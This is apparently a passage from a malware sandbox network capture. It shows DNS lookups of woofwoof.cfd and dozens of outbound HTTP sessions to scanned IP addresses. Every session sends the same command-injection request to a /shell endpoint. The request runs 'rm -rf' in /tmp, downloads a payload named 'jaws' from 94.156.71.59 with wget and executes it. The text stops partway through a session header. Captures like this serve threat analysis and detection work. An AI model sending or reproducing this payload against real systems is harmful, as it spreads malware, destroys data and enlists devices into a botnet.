                            Jun 10, 2024 15:39:34.527118921 CEST192.168.2.138.8.8.80xf27cStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:44.017738104 CEST192.168.2.138.8.8.80x63bcStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:53.511744976 CEST192.168.2.138.8.8.80x1954Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:54.394423008 CEST192.168.2.138.8.8.80x7036Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jun 10, 2024 15:37:58.501351118 CEST8.8.8.8192.168.2.130x502fNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:37:58.501351118 CEST8.8.8.8192.168.2.130x502fNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:08.026688099 CEST8.8.8.8192.168.2.130xcb44No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:08.026688099 CEST8.8.8.8192.168.2.130xcb44No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:08.905530930 CEST8.8.8.8192.168.2.130x3e1eNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:08.905530930 CEST8.8.8.8192.168.2.130x3e1eNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:18.416697025 CEST8.8.8.8192.168.2.130xd0aNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:18.416697025 CEST8.8.8.8192.168.2.130xd0aNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:19.279400110 CEST8.8.8.8192.168.2.130xf2a9No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:19.279400110 CEST8.8.8.8192.168.2.130xf2a9No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:20.150571108 CEST8.8.8.8192.168.2.130xcb81No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:20.150571108 CEST8.8.8.8192.168.2.130xcb81No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:21.005785942 CEST8.8.8.8192.168.2.130x32e0No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:21.005785942 CEST8.8.8.8192.168.2.130x32e0No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:21.881602049 CEST8.8.8.8192.168.2.130x8357No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:21.881602049 CEST8.8.8.8192.168.2.130x8357No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:31.376678944 CEST8.8.8.8192.168.2.130x1b28No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:31.376678944 CEST8.8.8.8192.168.2.130x1b28No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:40.873334885 CEST8.8.8.8192.168.2.130x17dcNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:40.873334885 CEST8.8.8.8192.168.2.130x17dcNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:41.728765011 CEST8.8.8.8192.168.2.130x5b42No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:41.728765011 CEST8.8.8.8192.168.2.130x5b42No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:42.577411890 CEST8.8.8.8192.168.2.130xf4beNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:42.577411890 CEST8.8.8.8192.168.2.130xf4beNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:52.076162100 CEST8.8.8.8192.168.2.130xeb7dNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:52.076162100 CEST8.8.8.8192.168.2.130xeb7dNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:52.926608086 CEST8.8.8.8192.168.2.130x6d24No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:52.926608086 CEST8.8.8.8192.168.2.130x6d24No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:53.780206919 CEST8.8.8.8192.168.2.130x119bNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:53.780206919 CEST8.8.8.8192.168.2.130x119bNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:54.879795074 CEST8.8.8.8192.168.2.130xd19eNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:54.879795074 CEST8.8.8.8192.168.2.130xd19eNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:55.730822086 CEST8.8.8.8192.168.2.130x391cNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:55.730822086 CEST8.8.8.8192.168.2.130x391cNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:05.221232891 CEST8.8.8.8192.168.2.130xa6b4No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:05.221232891 CEST8.8.8.8192.168.2.130xa6b4No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:14.718079090 CEST8.8.8.8192.168.2.130x7c3aNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:14.718079090 CEST8.8.8.8192.168.2.130x7c3aNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:15.551284075 CEST8.8.8.8192.168.2.130xfed4No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:15.551284075 CEST8.8.8.8192.168.2.130xfed4No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:25.038773060 CEST8.8.8.8192.168.2.130x4874No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:25.038773060 CEST8.8.8.8192.168.2.130x4874No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:34.534562111 CEST8.8.8.8192.168.2.130xf27cNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:34.534562111 CEST8.8.8.8192.168.2.130xf27cNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:44.024555922 CEST8.8.8.8192.168.2.130x63bcNo error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:44.024555922 CEST8.8.8.8192.168.2.130x63bcNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:53.519843102 CEST8.8.8.8192.168.2.130x1954No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:53.519843102 CEST8.8.8.8192.168.2.130x1954No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:54.401798010 CEST8.8.8.8192.168.2.130x7036No error (0)woofwoof.cfd94.156.71.59A (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:54.401798010 CEST8.8.8.8192.168.2.130x7036No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                            Session IDSource IPSource PortDestination IPDestination Port
                            0192.168.2.1337862203.54.242.16680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.745868921 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            1192.168.2.133282470.109.71.25580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.747936964 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            2192.168.2.1335674151.218.172.4880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.750932932 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            3192.168.2.135864850.13.193.16380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.753726006 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            4192.168.2.135343470.156.171.4380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.756000996 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            5192.168.2.134343457.244.132.16480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.758232117 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            6192.168.2.1335872194.55.24.2280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.760581017 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            7192.168.2.1350134102.230.19.25380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.762944937 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            8192.168.2.134595620.2.48.7880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.765228987 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            9192.168.2.136012688.157.63.2180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.767523050 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            10192.168.2.1339338193.5.227.12580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.769857883 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            11192.168.2.1349156181.171.108.6780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.772200108 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            12192.168.2.1354128115.56.153.5480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.774509907 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            13192.168.2.1359898213.227.25.21080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.776818037 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            14192.168.2.135922032.111.100.18780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.779103994 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            15192.168.2.1337506115.165.178.14380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.781383991 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            16192.168.2.13392189.203.151.16180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.783783913 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            17192.168.2.134024696.121.230.11580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.786107063 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            18192.168.2.134604231.24.128.11480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.788491011 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            19192.168.2.1341002173.150.225.18080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.790905952 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            20192.168.2.1352842181.232.47.25280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.793176889 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            21192.168.2.133748886.102.128.21180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.795427084 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            22192.168.2.133984213.159.171.23880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.797691107 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            23192.168.2.1342016195.50.200.22780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.799999952 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            24192.168.2.134784099.27.23.3380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.802263021 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            25192.168.2.1335958158.214.75.8080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.804503918 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            26192.168.2.134055684.162.2.580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.806757927 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            27192.168.2.133532851.33.7.19880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.809083939 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            28192.168.2.1354380167.251.162.14080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.811338902 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            29192.168.2.135562046.11.146.22280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.813572884 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            30192.168.2.135377678.199.201.12180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.815834999 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            31192.168.2.1340194111.31.234.21380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.818135023 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            32192.168.2.1348502145.193.92.11880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.820455074 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            33192.168.2.1334326161.147.107.20080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.822693110 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            34192.168.2.1348068189.244.26.21580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.824954987 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            35192.168.2.1351382160.158.220.22180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.827151060 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            36192.168.2.133506674.221.113.14080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.829282045 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            37192.168.2.1353462220.219.206.9980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.831568003 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            38192.168.2.1351492154.68.192.2980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.833827019 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            39192.168.2.1340004184.225.110.22380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.836086035 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            40192.168.2.133421639.251.150.23580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.838365078 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            41192.168.2.133390037.242.196.2580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.840660095 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            42192.168.2.1349276219.24.143.22180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.842964888 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            43192.168.2.136092620.163.218.11680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.845253944 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            44192.168.2.135852292.126.239.18080
